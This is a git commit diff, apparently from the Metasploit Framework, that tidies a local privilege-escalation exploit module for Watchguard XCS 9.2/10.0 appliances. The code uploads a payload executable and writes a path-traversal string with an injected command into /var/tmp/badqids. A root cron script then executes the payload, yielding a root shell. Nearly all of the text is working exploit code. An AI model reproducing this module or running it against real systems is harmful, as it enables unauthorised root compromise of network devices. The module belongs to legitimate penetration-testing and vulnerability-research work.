Do watchguard_local_privesc code cleaning

bug/bundler_fix
jvazquez-r7 2015-09-25 11:35:21 -05:00
parent c79671821d
commit 6b46316a56
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 29 additions and 21 deletions

View File

@ -7,7 +7,10 @@
require 'msf/core'
class Metasploit4 < Msf::Exploit::Local
Rank = ExcellentRanking
# It needs 3 minutes wait time
# WfsDelay set to 180, so it should be a Manual exploit,
# to avoid it being included in automations
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Post::File
@ -32,63 +35,68 @@ class Metasploit4 < Msf::Exploit::Local
'Platform' => 'bsd',
'Arch' => ARCH_X86_64,
'SessionTypes' => ['shell'],
'Privileged' => false,
'Privileged' => true,
'Targets' =>
[
[ 'Watchguard XCS 9.2/10.0', { }]
],
'DefaultOptions' => { 'WfsDelay' => 180 },
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 29 2015'
))
end
def setup
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a native bsd payload')
end
super
end
def check
#Basic check to see if the device is a Watchguard XCS
res = cmd_exec('uname -a')
return Exploit::CheckCode::Appears if res =~ /support-xcs@watchguard.com/
return Exploit::CheckCode::Detected if res && res.include?('support-xcs@watchguard.com')
Exploit::CheckCode::Safe
end
def upload_payload
#Generates and uploads the payload to the device
fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
@pl = generate_payload_exe
write_file(fname, @pl)
return nil if not file_exist?(fname)
return nil unless file_exist?(fname)
cmd_exec("chmod +x #{fname}")
return fname
fname
end
def exploit
print_status("Rooting can take up to 3 minutes.")
print_warning('Rooting can take up to 3 minutes.')
#Generate and upload the payload
filename = upload_payload
fail_with(Failure::NotFound, "Payload failed to upload") if filename.nil?
fail_with(Failure::NotFound, 'Payload failed to upload') if filename.nil?
print_status("Payload #{filename} uploaded.")
#Sets up empty dummy file needed for privesc
dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
cmd_exec("touch #{dummy_filename}")
vprint_status("Added dummy file")
vprint_status('Added dummy file')
#Put the shell injection line into badqids
#setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids"
badqids = write_file("/var/tmp/badqids","../../../../../..#{dummy_filename};#{filename}")
fail_with(Failure::NotFound, "Failed to create badqids file to exploit crontab") if badqids.nil?
print_status("Badqids created, waiting for vulnerable script to be called by crontab...")
badqids = write_file('/var/tmp/badqids', "../../../../../..#{dummy_filename};#{filename}")
fail_with(Failure::NotFound, 'Failed to create badqids file to exploit crontab') if badqids.nil?
print_status('Badqids created, waiting for vulnerable script to be called by crontab...')
#cmd_exec(setup_privesc)
#Cleanup the files we used
register_file_for_cleanup("/var/tmp/badqids")
register_file_for_cleanup('/var/tmp/badqids')
register_file_for_cleanup(dummy_filename)
register_file_for_cleanup(filename)
#Wait for crontab to run vulnerable script
select(nil,nil,nil,180) #Wait 3 minutes to ensure cron script is run
print_status("Ran out of time, should have root shell by now.")
end
end